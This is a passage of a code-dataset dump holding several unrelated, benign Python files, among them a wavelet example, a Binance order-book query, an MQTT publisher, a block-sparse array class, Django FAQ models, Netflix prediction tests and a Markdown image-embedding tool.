}\n","sub_path":"tests/services/user/test_suspend_unsuspend.py","file_name":"test_suspend_unsuspend.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"465253971","text":"import pywt\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nts = [2, 56, 3, 22, 3, 4, 56, 7, 8, 9, 44, 23, 1, 4, 6, 2]\n\n(ca, cd) = pywt.dwt(ts,'haar')\n\ncat = pywt.thresholding.soft(ca, np.std(ca)/2)\ncdt = pywt.thresholding.soft(cd, np.std(cd)/2)\n\nts_rec = pywt.idwt(cat, cdt, 'haar')\n\nplt.close('all')\n\nplt.subplot(211)\n# Original coefficients\nplt.plot(ca, '--*b')\nplt.plot(cd, '--*r')\n# Thresholded coefficients\nplt.plot(cat, '--*c')\nplt.plot(cdt, '--*m')\nplt.legend(['ca','cd','ca_thresh', 'cd_thresh'], loc=0)\nplt.grid('on')\n\nplt.subplot(212)\nplt.plot(ts)\nplt.hold('on')\nplt.plot(ts_rec, 'r')\nplt.legend(['original signal', 'reconstructed signal'])\nplt.grid('on')\nplt.show()","sub_path":"pds_codes_imgs/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"243447797","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n\nimport os\nimport requests\nimport json\n\ndef depth(symbol, limit=10):\n try:\n key = os.getenv('APIKEY')\n #secret = os.getenv('APISECRET')\n base_url = \"https://api.binance.com\"\n with requests.Session() as s:\n s.headers = {\n 'X-MBX-APIKEY': key\n }\n return json.loads(s.get(base_url + (\"/api/v1/depth?symbol=%s&limit=%d\" % (symbol, limit))).text)\n except:\n return {}\n","sub_path":"workers/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"544959683","text":"import paho.mqtt.client as paho\nimport argparse\nimport time\nimport sys\nimport datetime\nimport time\nimport json\n\n\"\"\"\nThe publisher will publish a message which will be received from a subscriber.\nThis publisher publishes the user names for which the retail prices must be calculated.\n\"\"\"\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n #160.40.49.197 Current hostname\n '--h', type = str,\n required=True\n )\n\nparser.add_argument(\n\n '--list', type = str,\n nargs='+',\n help=' Set flag',\n required=True)\n\nargs = parser.parse_args()\nbroker = args.h #host name , Replace with your IP address.\ntopic = \"info\"\n#port=1883 #MQTT data listening port\n#ACCESS_TOKEN='M7OFDCmemyKoi461BJ4j' #not always necessary\n\ndef on_publish(client,userdata,result):\n '''The function for callback (paho MQTT client).'''\n print(\"Published data is : \")\n pass\n\nclient1 = paho.Client(\"control2\") #create client object\nclient1.on_publish = on_publish #assign function to callback\n#client1.username_pw_set(ACCESS_TOKEN) #access token from thingsboard device\n#client1.connect(broker,port,keepalive=60) #establishing connection\nclient1.connect(broker)\n\nid = []\nid = args.list\ntopic1 = []\n\nfor i in range(0, len(id)):\n topic1.append(\"drimpac/epe/\" + id[i])\n\nuser_info = [{\"User_Id\": t, \"Topic\": s} for t, s in zip(id, topic1)]\n\nMQTT_MSG = json.dumps(user_info, indent = 4)\nret = client1.publish(topic, MQTT_MSG) #topic name is test\nprint(MQTT_MSG)\nprint(\"Please check data on your Subscriber Code \\n\")\n","sub_path":"drimpac-rest-api/server/pythonScripts/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"568034816","text":"from numbers import Integral\n\nimport numpy as np\n\nfrom . import bumpy\n\nfrom .slicing import normalize_index\nfrom .butils import _zero_of_dtype\nfrom .bsparse_array import BSparseArray\nfrom .compatibility import int, range, zip\n\n\nclass BDOK(BSparseArray):\n \"\"\"\n A class for building sparse multidimensional arrays.\n\n Parameters\n ----------\n shape : tuple[int] (BDOK.ndim,)\n The shape of the array.\n data : dict, optional\n The key-value pairs for the data in this array.\n dtype : np.dtype, optional\n The data type of this array. If left empty, it is inferred from\n the first element.\n\n Attributes\n ----------\n dtype : numpy.dtype\n The datatype of this array. Can be :code:`None` if no elements\n have been set yet.\n shape : tuple[int]\n The shape of this array.\n data : dict\n The keys of this dictionary contain all the indices and the values\n contain the nonzero entries.\n\n See Also\n --------\n BCOO : A read-only sparse array.\n\n Examples\n --------\n You can create :obj:`BDOK` objects from Numpy arrays.\n\n >>> x = np.eye(5, dtype=np.uint8)\n >>> x[2, 3] = 5\n >>> s = BDOK.from_numpy(x)\n >>> s\n \n\n You can also create them from just shapes, and use slicing assignment.\n\n >>> s2 = BDOK((5, 5), dtype=np.int64)\n >>> s2[1:3, 1:3] = [[4, 5], [6, 7]]\n >>> s2\n \n\n You can convert :obj:`BDOK` arrays to :obj:`BCOO` arrays, or :obj:`numpy.ndarray`\n objects.\n\n >>> from sparse import BCOO\n >>> s3 = BCOO(s2)\n >>> s3\n \n >>> s2.todense() # doctest: +NORMALIZE_WHITESPACE\n array([[0, 0, 0, 0, 0],\n [0, 4, 5, 0, 0],\n [0, 6, 7, 0, 0],\n [0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0]])\n\n >>> s4 = BCOO.from_numpy(np.eye(4, dtype=np.uint8))\n >>> s4\n \n >>> s5 = BDOK.from_bcoo(s4)\n >>> s5\n \n\n You can also create :obj:`BDOK` arrays from a shape and a dict of\n values. Zeros are automatically ignored.\n\n >>> values = {\n ... (1, 2, 3): 4,\n ... (3, 2, 1): 0,\n ... }\n >>> s6 = BDOK((5, 5, 5), values)\n >>> s6\n \n \"\"\"\n\n def __init__(self, shape, block_shape=None, data=None, dtype=None):\n from .bcoo import BCOO\n self.data = dict()\n\n if isinstance(shape, BCOO):\n if block_shape is not None:\n raise RuntimeError('Cannot supply block_shape when converting from BCOO')\n ar = BDOK.from_bcoo(shape)\n self._make_shallow_copy_of(ar)\n return\n\n if block_shape is None:\n raise RuntimeError('block_shape cannot be None unless initializing from BCOO')\n\n if isinstance(shape, np.ndarray): \n ar = BDOK.from_numpy(shape, block_shape)\n self._make_shallow_copy_of(ar)\n return\n\n self.dtype = np.dtype(dtype)\n super(BDOK, self).__init__(shape, block_shape)\n\n if not data:\n data = dict()\n\n if isinstance(data, dict):\n if not dtype:\n if not len(data):\n self.dtype = np.dtype('float64')\n else:\n self.dtype = np.result_type(*map(lambda x: np.asarray(x).dtype, data.values()))\n\n for c, d in data.items():\n self[c] = d\n else:\n raise ValueError('data must be a dict.')\n\n def _make_shallow_copy_of(self, other):\n super(BDOK, self).__init__(other.shape, other.block_shape)\n self.dtype = other.dtype\n self.data = other.data\n\n @classmethod\n def from_bcoo(cls, x):\n \"\"\"\n Get a :obj:`BDOK` array from a :obj:`BCOO` array.\n\n Parameters\n ----------\n x : BCOO\n The array to convert.\n\n Returns\n -------\n BDOK\n The equivalent :obj:`BDOK` array.\n\n Examples\n --------\n >>> from sparse import BCOO\n >>> s = BCOO.from_numpy(np.eye(4))\n >>> s2 = BDOK.from_bcoo(s)\n >>> s2\n \n \"\"\"\n ar = cls(x.shape, x.block_shape, dtype=x.dtype)\n\n for c, d in zip(x.coords.T, x.data):\n ar.data[tuple(c)] = d\n\n return ar\n\n def to_bcoo(self):\n \"\"\"\n Convert this :obj:`BDOK` array to a :obj:`BCOO` array.\n\n Returns\n -------\n BCOO\n The equivalent :obj:`BCOO` array.\n\n Examples\n --------\n >>> s = BDOK((5, 5))\n >>> s[1:3, 1:3] = [[4, 5], [6, 7]]\n >>> s\n \n >>> s2 = s.to_bcoo()\n >>> s2\n \n \"\"\"\n from .bcoo import BCOO\n return BCOO(self)\n\n @classmethod\n def from_numpy(cls, x, block_shape):\n \"\"\"\n Get a :obj:`BDOK` array from a Numpy array.\n\n Parameters\n ----------\n x : np.ndarray\n The array to convert.\n\n Returns\n -------\n BDOK\n The equivalent :obj:`BDOK` array.\n\n Examples\n --------\n >>> s = BDOK.from_numpy(np.eye(4))\n >>> s\n \n \"\"\"\n ar = cls(x.shape, block_shape, dtype=x.dtype)\n\n # first convert to bndarray\n ba = bumpy.bndarray(ar.outer_shape, block_shape, data = x) \n sum_x = np.zeros(ar.outer_shape)\n for ix in np.ndindex(sum_x.shape):\n sum_x[ix] = np.sum(np.abs(ba[ix]))\n \n coords = np.nonzero(sum_x)\n data = ba[coords]\n\n for c in zip(data, *coords):\n d, c = c[0], c[1:]\n ar.data[c] = d\n\n return ar\n\n @classmethod\n def from_bumpy(cls, x, block_shape):\n \"\"\"\n Get a :obj:`BDOK` array from a bumpy array.\n\n Parameters\n ----------\n x : bumpy.bndarray\n The array to convert.\n\n Returns\n -------\n BDOK\n The equivalent :obj:`BDOK` array.\n\n Examples\n --------\n \"\"\"\n ar = cls(x.shape, block_shape, dtype=x.dtype)\n\n # first convert to bndarray\n ba = x \n sum_x = np.zeros(ar.outer_shape)\n for ix in np.ndindex(sum_x.shape):\n sum_x[ix] = np.sum(np.abs(ba[ix]))\n \n coords = np.nonzero(sum_x)\n data = ba[coords]\n\n for c in zip(data, *coords):\n d, c = c[0], c[1:]\n ar.data[c] = d\n\n return ar\n\n\n @property\n def nnz(self):\n \"\"\"\n The number of nonzero elements in this array.\n\n Returns\n -------\n int\n The number of nonzero elements.\n\n See Also\n --------\n BCOO.nnz : Equivalent :obj:`BCOO` array property.\n numpy.count_nonzero : A similar Numpy function.\n scipy.sparse.bdok_matrix.nnz : The Scipy equivalent property.\n\n Examples\n --------\n >>> values = {\n ... (1, 2, 3): 4,\n ... (3, 2, 1): 0,\n ... }\n >>> s = BDOK((5, 5, 5), values)\n >>> s.nnz\n 1\n \"\"\"\n return len(self.data) * np.product(self.block_shape)\n\n def __getitem__(self, key):\n key = normalize_index(key, self.outer_shape)\n\n if not all(isinstance(i, Integral) for i in key):\n raise NotImplementedError('All indices must be integers'\n ' when getting an item.')\n\n if len(key) != self.ndim:\n raise NotImplementedError('Can only get single elements. '\n 'Expected key of length %d, got %s'\n % (self.ndim, str(key)))\n\n key = tuple(int(k) for k in key)\n\n if key in self.data:\n return self.data[key]\n else:\n #return _zero_of_dtype(self.dtype)[()]\n return np.zeros(self.block_shape, dtype = self.dtype)\n\n def __setitem__(self, key, value):\n key = normalize_index(key, self.outer_shape)\n value = np.asanyarray(value)\n\n value = value.astype(self.dtype)\n\n key_list = [int(k) if isinstance(k, Integral) else k for k in key]\n\n self._setitem(key_list, value)\n\n def _setitem(self, key_list, value):\n #value_missing_dims = len([ind for ind in key_list if isinstance(ind, slice)]) - value.ndim \n \n # ZHC NOTE: here I think should be some additional treatment of slicing.\n # currently only precise indexing is tested.\n\n #if value_missing_dims < 0:\n # raise ValueError('setting an array element with a sequence.')\n\n\n\n for i, ind in enumerate(key_list):\n if isinstance(ind, slice):\n step = ind.step if ind.step is not None else 1\n if step > 0:\n start = ind.start if ind.start is not None else 0\n start = max(start, 0)\n stop = ind.stop if ind.stop is not None else self.outer_shape[i]\n stop = min(stop, self.outer_shape[i])\n if start > stop:\n start = stop\n else:\n start = ind.start or self.outer_shape[i] - 1\n stop = ind.stop if ind.stop is not None else -1\n start = min(start, self.outer_shape[i] - 1)\n stop = max(stop, -1)\n if start < stop:\n start = stop\n\n key_list_temp = key_list[:]\n for v_idx, ki in enumerate(range(start, stop, step)):\n key_list_temp[i] = ki\n vi = value if value_missing_dims > 0 else \\\n (value[0] if value.shape[0] == 1 else value[v_idx])\n self._setitem(key_list_temp, vi)\n\n return\n elif not isinstance(ind, Integral):\n raise IndexError('All indices must be slices or integers'\n ' when setting an item.')\n\n key = tuple(key_list)\n #if value != _zero_of_dtype(self.dtype):\n if np.sum(np.abs(value)) != 0.0:\n self.data[key] = value[()]\n elif key in self.data:\n del self.data[key]\n\n def __str__(self):\n return \"\" % (self.shape, self.outer_shape, self.block_shape, self.dtype, self.nnz)\n\n __repr__ = __str__\n\n def todense(self):\n \"\"\"\n Convert this :obj:`BDOK` array into a Numpy array.\n\n Returns\n -------\n numpy.ndarray\n The equivalent dense array.\n\n See Also\n --------\n BCOO.todense : Equivalent :obj:`BCOO` array method.\n scipy.sparse.bdok_matrix.todense : Equivalent Scipy method.\n\n Examples\n --------\n >>> s = BDOK((5, 5))\n >>> s[1:3, 1:3] = [[4, 5], [6, 7]]\n >>> s.todense() # doctest: +SKIP\n array([[0., 0., 0., 0., 0.],\n [0., 4., 5., 0., 0.],\n [0., 6., 7., 0., 0.],\n [0., 0., 0., 0., 0.],\n [0., 0., 0., 0., 0.]])\n \"\"\"\n result = bumpy.zeros(self.outer_shape, self.block_shape, dtype = self.dtype)\n\n for c, d in self.data.items():\n result[c] = d\n \n return result.todense()\n\n def to_bumpy(self):\n \"\"\"\n Convert this :obj:`BDOK` array into a bumpy array.\n\n Returns\n -------\n bumpy.bndarray\n The equivalent dense array.\n\n See Also\n --------\n BCOO.todense : Equivalent :obj:`BCOO` array method.\n scipy.sparse.bdok_matrix.todense : Equivalent Scipy method.\n\n Examples\n --------\n \"\"\"\n result = bumpy.zeros(self.outer_shape, self.block_shape, dtype = self.dtype)\n\n for c, d in self.data.items():\n result[c] = d\n \n return result\n\n\n\n def asformat(self, format):\n \"\"\"\n Convert this sparse array to a given format.\n\n Parameters\n ----------\n format : str\n A format string.\n\n Returns\n -------\n out : SparseArray\n The converted array.\n\n Raises\n ------\n NotImplementedError\n If the format isn't supported.\n \"\"\"\n if format == 'bdok' or format is BDOK:\n return self\n\n from .bcoo import BCOO\n if format == 'bcoo' or format is BCOO:\n return BCOO.from_iter(self.data, shape=self.shape,\n block_shape=self.block_shape)\n\n raise NotImplementedError('The given format is not supported.')\n","sub_path":"sparse/bdok.py","file_name":"bdok.py","file_ext":"py","file_size_in_byte":12902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"376104682","text":"import datetime\nfrom django.conf import settings\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom managers import PreOrderedManager\n\nclass Topic(models.Model):\n \"\"\"\n Generic Topics for FAQ question grouping\n \"\"\"\n name = models.CharField(_('name'), max_length=150)\n sort_order = models.IntegerField(_('sort order'), default=0,\n help_text=_('The order you would like the topic to be displayed.'))\n\n objects = PreOrderedManager()\n\n def get_absolute_url(self):\n return '/faq/' + self.slug\n\n class Meta:\n verbose_name = _(\"Topic\")\n verbose_name_plural = _(\"Topics\")\n ordering = ['sort_order', 'name']\n\n def __unicode__(self):\n return self.name\n\nclass Question(models.Model):\n text = models.TextField(_('question'), help_text=_('The actual question itself.'))\n answer = models.TextField(_('answer'), blank=True, help_text=_('The answer text.'))\n topic = models.ForeignKey(Topic, verbose_name=_('topic'), related_name='questions')\n \n protected = models.BooleanField(_('is protected'), default=False,\n help_text=_(\"Set true if this question is only visible by authenticated users.\"))\n \n sort_order = models.IntegerField(_('sort order'), default=0,\n help_text=_('The order you would like the question to be displayed.'))\n\n objects = PreOrderedManager()\n\n class Meta:\n verbose_name = _(\"Frequent asked question\")\n verbose_name_plural = _(\"Frequently asked questions\")\n ordering = ['sort_order']\n\n def __unicode__(self):\n return self.text\n","sub_path":"faq/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"620219752","text":"__author__ = 'wnation'\n\n#!/usr/bin/env python3\n\n# -------------------------------\n\n# -------------------------------\n\n\"\"\"\nTo test the program:\n\t% python TestNetflix.py >& TestNetflix.out\n\t% chmod ugo+x TestNetflix.py\n\t% TestNetflix.py >& TestNetflix.out\n\"\"\"\n\n# -------\n# imports\n# -------\n\nimport io\nimport unittest\n\nfrom Netflix import weighted_dict, rmse, netflix_read, netflix_print, netflix_solve\n\n# -----------\n# TestCollatz\n# -----------\n\nclass TestNetflix (unittest.TestCase) :\n\n\t# ----\n\t# rmse\n\t# ----\n\n\tdef test_rmse_1 (self) :\n\t\tv = rmse((1,2,3), (1,2,3))\n\t\tself.assertTrue(str(v) == \"0.0\")\n\n\tdef test_rmse_2 (self) :\n\t\tv = rmse((1,2,3), (2,3,4))\n\t\tself.assertTrue(str(v) == \"1.0\")\n\n\tdef test_rmse_3 (self) :\n\t\tv = rmse((2,3,4), (4,3,2))\n\t\tself.assertTrue(str(v) == \"1.632993161855452\")\n\n\tdef test_rmse_4 (self) :\n\t\tself.assertRaises(AssertionError,rmse,(1,1,1), (1,1))\n\n\n\t# ----\n\t# netflix_read\n\t# ----\n\n\tdef test_read_1 (self) :\n\t\tr = io.StringIO(\"1:\\n1\\n2\\n3\\n2:\\n1\\n2\\n3\\n\")\n\t\tm = {}\n\t\tm = netflix_read(r)\n\t\tself.assertTrue(m[1] == [1,2,3])\n\t\tself.assertTrue(m[2] == [1,2,3])\n\n\tdef test_read_2 (self) :\n\t\tr = io.StringIO(\"1:\\n1\\n10\\n1000\\n2:\\n10\\n\")\n\t\tm = {}\n\t\tm = netflix_read(r)\n\t\tself.assertTrue(m[1] == [1,10,1000])\n\t\tself.assertTrue(m[2] == [10])\n\n\tdef test_read_3 (self) :\n\t\tr = io.StringIO(\"1:\\n1\\n10\\n1000\\n2:\\n0\")\n\t\tm = {}\n\t\tm = netflix_read(r)\n\t\tself.assertTrue(m[1] == [1,10,1000])\n\t\tself.assertTrue(m[2] == [0])\n\t\t\n\tdef test_read_4 (self) :\n\t\tr = io.StringIO(\"1:\\n1\\n2:\\n\")\n\t\tm = {}\n\t\tm = netflix_read(r)\n\t\tself.assertTrue(m[1] == [1])\n\t\tself.assertTrue(m[2] == [])\n\n\t\n\n\t# -----\n\t# netflix_solve\n\t# -----\n\tdef test_netflix_solve_1 (self):\n\t\tr = io.StringIO(\"1005:\\n188792\\n239493\\n532649\")\n\t\tw = io.StringIO()\n\t\tnetflix_solve(r, w)\n\t\tself.assertTrue(w.getvalue() == \n\t\t\t\"1005:\\n3.108410\\n2.977337\\n2.723416\\nRMSE: 0.6630175045447323\\n\")\n\n\tdef test_netflix_solve_2 (self):\n\t\tr = io.StringIO(\"10042:\\n86062\")\n\t\tw = io.StringIO()\n\t\tnetflix_solve(r, w)\n\t\tself.assertTrue(w.getvalue() == \"10042:\\n4.672252\\nRMSE: 0.3277478223987025\\n\")\n\t\n\tdef test_netflix_solve_3 (self):\n\t\tr = io.StringIO(\"\")\n\t\tw = io.StringIO()\n\t\tself.assertRaises(AssertionError,netflix_solve,r, w)\n\t\t\n\t# -----\n\t# weighted_dict\n\t# -----\n\tdef test_weighted_dict_1 (self):\n\t\tdictionary = {1:[2,3,4], 2:[2,3,4]}\n\t\tm_avg = {1:3.0, 2: 4.0}\n\t\tc_avg = {2: 3.0, 3: 4.0, 4: 5.0}\n\t\tweight = {}\n\t\tweight = weighted_dict(dictionary, c_avg, m_avg)\n\t\tself.assertTrue(weight[1] == [2.3, 3.3, 4.3])\n\t\tself.assertTrue(weight[2] == [3.3, 4.3, 5.0])\n\t\t\n\tdef test_weighted_dict_2 (self):\n\t\tdictionary = {1:[2,3,4], 2:[2,3,5], 3:[6]}\n\t\tm_avg = {1:1.1, 2: 4.99, 3:3.5}\n\t\tc_avg = {2: 4.9, 3: 2.33, 4: 1.1, 5:3.35, 6:3.5}\n\t\tweight = {}\n\t\tweight = weighted_dict(dictionary, c_avg, m_avg)\n\t\tself.assertTrue(weight[1] == [2.3000000000000003, 1.0, 1.0])\n\t\tself.assertTrue(weight[2] == [5.0, 3.62, 4.640000000000001])\n\t\tself.assertTrue(weight[3] == [3.3])\n\t\n\t# -----\n\t# netflix_print\n\t# -----\n\tdef test_netflix_print_1 (self):\n\t\tdictionary = {1:[2,3,4], 2:[2,3,4]}\n\t\tm_avg = {1:3.0, 2: 4.0}\n\t\tc_avg = {2: 3.0, 3: 4.0, 4: 5.0}\n\t\tweight = {}\n\t\tweight = weighted_dict(dictionary, c_avg, m_avg)\n\t\tw = io.StringIO()\n\t\tnetflix_print(weight, w)\n\t\tself.assertTrue(w.getvalue() == \"1:\\n2.300000\\n3.300000\\n4.300000\\n2:\\n\"\n\t\t\t+ \"3.300000\\n4.300000\\n5.000000\\n\")\n\t\t\t\n\tdef test_netflix_print_2 (self):\n\t\tdictionary = {1:[2,3,4], 2:[2,3,4]}\n\t\tm_avg = {1:1.0, 2: 1.0}\n\t\tc_avg = {2: 5.0, 3: 5.0, 4: 5.0}\n\t\tweight = {}\n\t\tweight = weighted_dict(dictionary, c_avg, m_avg)\n\t\tw = io.StringIO()\n\t\tnetflix_print(weight, w)\n\t\tself.assertTrue(w.getvalue() == \"1:\\n2.300000\\n2.300000\\n2.300000\\n2:\\n2.300000\\n\"\n\t\t\t+ \"2.300000\\n2.300000\\n\")\n\t\t\n\n\n# ----\n# main\n# ----\n\nprint(\"TestNetflix.py\")\nunittest.main()\nprint(\"Done.\")\n","sub_path":"wnation-TestNetflix.py","file_name":"wnation-TestNetflix.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"409126367","text":"#!/usr/bin/env python\n#=========================================================================\n# This is OPEN SOURCE SOFTWARE governed by the Gnu General Public\n# License (GPL) version 3, as described at www.opensource.org.\n# Copyright (C)2017 William H. Majoros (martiandna@gmail.com).\n#=========================================================================\nfrom __future__ import (absolute_import, division, print_function, \n unicode_literals, generators, nested_scopes, with_statement)\nfrom builtins import (bytes, dict, int, list, object, range, str, ascii,\n chr, hex, input, next, oct, open, pow, round, super, filter, map, zip)\n# The above imports should allow this program to run in both Python 2 and\n# Python 3. You might need to update your version of module \"future\".\nimport sys\nimport ProgramName\nfrom Rex import Rex\nrex=Rex()\n\nTHOUSAND_FREQS=\"/home/bmajoros/stan/1000G-freqs.txt\"\n\ndef loadThousand():\n thousand={}\n with open(THOUSAND_FREQS,\"rt\") as IN:\n for line in IN:\n fields=line.rstrip().split()\n if(len(fields)!=2): continue\n (id,freq)=fields\n if(rex.find(\",\",freq)):\n subfields=freq.split(\",\")\n values=[]\n for subfield in subfields: values.append(float(subfield))\n freq=max(values)\n else: freq=float(freq)\n count=freq*5008\n thousand[id]=count\n return thousand\n\n#=========================================================================\n# main()\n#=========================================================================\nif(len(sys.argv)!=2):\n exit(ProgramName.get()+\" \\n\")\n(infile,)=sys.argv[1:]\n\n#thousand=loadThousand()\nwith open(infile,\"rt\") as IN:\n for line in IN:\n if(rex.find(\"^\\s*#\",line)): continue\n if(rex.find(\"CHROM\",line)): continue\n fields=line.rstrip().split()\n chrom=fields[0]\n pos=fields[1]\n id=fields[2]\n n=len(fields)\n ref=0; alt=0\n for i in range(9,n):\n if(not rex.find(\"^(\\d)[/|](\\d)\",fields[i])): continue\n left=int(rex[1])\n right=int(rex[2])\n alt+=left+right\n ref+=2-left-right\n total=ref+alt\n #ref=float(ref)/float(total)\n #alt=float(alt)/float(total)\n if(alt==0 or ref==0): continue\n thousandCount=0 #thousand.get(id,0)\n altCount=alt+thousandCount\n altFreq=float(altCount)/float(total+5008)\n carlFreq=float(alt)/float(total)\n if(id==\".\"): id=chrom+\"@\"+pos\n #print(id,altFreq,carlFreq,altFreq>carlFreq,alt,thousandCount,sep=\"\\t\")\n #print(id,carlFreq,sep=\"\\t\")\n print(id,chrom,pos,fields[3],fields[4],sep=\"\\t\")\n\n\n","sub_path":"parse-vcf.py","file_name":"parse-vcf.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"509958444","text":"from collections import Counter\nfrom typing import List\n\n\nclass Solution:\n \"\"\" Accepted \"\"\"\n def totalFruit(self, tree: List[int]) -> int:\n p1 = p2 = max_res = 0\n counter, t = Counter(), 0\n\n while p1 < len(tree) and p2 < len(tree):\n if t <= 2:\n if counter[tree[p2]] == 0:\n t += 1\n counter[tree[p2]] += 1\n p2 += 1\n\n if t <= 2 and max_res < p2 - p1:\n max_res = p2 - p1\n else:\n counter[tree[p1]] -= 1\n if counter[tree[p1]] == 0:\n t -= 1\n p1 += 1\n\n return max_res","sub_path":"leetcode/p0904_fruit_basket/my_attempt.py","file_name":"my_attempt.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"422968547","text":"from tkinter import *\r\nimport tkinter.filedialog\r\nimport re\r\nimport base64\r\nimport requests\r\nfrom io import BytesIO\r\nimport imghdr\r\n\r\nroot = Tk()\r\nroot.title('MD文件在线图片base64转码保存')\r\nroot.geometry('380x300')\r\nfiledirs = []\r\n\r\ndef xz():\r\n filenames = tkinter.filedialog.askopenfilenames()\r\n if len(filenames) != 0:\r\n string_filename = \"\"\r\n for i in range(0,len(filenames)):\r\n string_filename += str(filenames[i])+\"\\n\"\r\n filedirs.append(str(filenames[i]))\r\n lb.config(text = \"您选择的文件是:\\n\"+string_filename)\r\n else:\r\n lb.config(text = \"您没有选择任何文件\")\r\n\r\ndef getimage(url):\r\n imgurl = url\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.864.37\"}\r\n result = requests.request(\"GET\", imgurl, headers=headers)\r\n ls_f=base64.b64encode(BytesIO(result.content).read())\r\n imgtype= imghdr.what(None,result.content)\r\n if imgtype == 'webp': \r\n result = 'data:image/jpg;base64,'+str(ls_f.decode('utf8'))\r\n else:\r\n result = 'data:image/'+imgtype+';base64,'+str(ls_f.decode('utf8'))\r\n return result\r\n\r\ndef main():\r\n for file in filedirs:\r\n file_obj = open(file,'r+',encoding='utf-8')\r\n content = file_obj.read()\r\n pattern = re.compile(r\"!\\[.*\\]\\((.*?)\\)\")\r\n rule = pattern.findall(content)\r\n print('共转化'+str(len(rule))+'张图片')\r\n for url in rule:\r\n try:\r\n result = getimage(url)\r\n content = content.replace(url,result)\r\n with open(file,\"w\",encoding=\"utf-8\") as f:\r\n f.write(content)\r\n except:\r\n url1 = re.sub(r'////', '//', url)\r\n result = getimage(url1)\r\n content = content.replace(url,result)\r\n with open(file,\"w\",encoding=\"utf-8\") as f:\r\n f.write(content)\r\n lb.config(text = \"转换完成\",fg=\"red\",font=(\"微软雅黑\", 24, \"bold\", \"italic\"),height=50,width=100)\r\n\r\nlb = Label(root,text = '')\r\nlb.pack()\r\nbtn = Button(root,text=\"选择MD文件\",command=xz,font=(\"微软雅黑\", 18))\r\nbtn.pack()\r\nstartbtn = Button(root,text=\"开始转换\",command=main,font=(\"微软雅黑\", 18))\r\nstartbtn.pack()\r\nroot.mainloop()","sub_path":"md-finished.py","file_name":"md-finished.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"596766770","text":"'''crie um programa que tenha uma tupla unica com nomes de produto e respectivos preços na seguencia\nno final mostre os preços organizando os dados em forma tabular'''\n'''listagem de preço '''\n\nlista = ('Lapis',1.75,\n 'Borracha', 0.50,\n 'Caderno', 5.0,\n 'Estojo', 4.0,\n 'Caneta',3.0,\n 'Mochila',35.0,\n 'Borracha', 0.50,\n 'Caderno', 5.0,\n 'Estojo', 4.0,\n 'Caneta',3.0,\n 'Mochila',35.0,\n 'Livro',25.0)\nprint('===='*30)\nprint(f'{\"LISTAGEM DE PREÇOS\":^80}')\nprint('===='*30)\nfor pos in range(len(lista)):\n if pos % 2 == 0:\n print(f'{lista[pos]:.<30}',end='')\n else:\n print(f'R${lista[pos]:>7.2f}')\nprint('===='*30)\n","sub_path":"ex076.py","file_name":"ex076.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"459420005","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Jonathan Halama\n@date: 25 March, 2019\n@purpose: Locations fish movements from HexSim Lof file.\n\"\"\"\nimport os\nimport time\nstarttime = time.time()\n\ndef findHexSimSTPandDSP (hexSimLogFile, newHexSimLogFile):\n myInputFile = open(hexSimLogFile, 'r')\n myNewFile = open(newHexSimLogFile, 'w')\n\n # Read each line in the log file.\n for line in myInputFile:\n # \n lineInfo = line.split(\",\")\n \n if (lineInfo[0] == \"STP\"):\n # New model timestep.\n myNewFile.write(line)\n\n if (lineInfo[0] == \"DSP\"):\n myNewFile.write(line)\n \n###### User inputs ######\nmyFilepath = \"C:\\\\Users\\\\Jonat\\\\Desktop\\\\CWR_LeafletMaps\\\\TEST.log\"\nfilesize = os.path.getsize(myFilepath)\nnewHexSimLogFile = (\"C:\\\\Users\\\\Jonat\\\\Desktop\\\\CWR_LeafletMaps\\\\smalllerTEST.log\")\n\nfindHexSimSTPandDSP(myFilepath, newHexSimLogFile)\n\ntotaltime = time.time() - starttime\n\nminutes = 0\nseconds = 0\n\nif (totaltime > 60):\n minutes = int(totaltime/60)\n seconds = int(totaltime - (minutes*60))\n '{:2d}'.format(seconds)\n \n\nprint (\"Done isolating fish and steps. Processing took: \" + str(minutes) + \"minutes and \" + str(seconds) + \" seconds to process the HexSim log file of size: \" + str(filesize) + \" KB. You are welcome.\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"ProcessHexSimLogFileFor_STP_DSP.py","file_name":"ProcessHexSimLogFileFor_STP_DSP.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"465270418","text":"# NAME: serial_write.py\n# AUTHOR: Matthew Miller\n# PURPOSE: Records data from 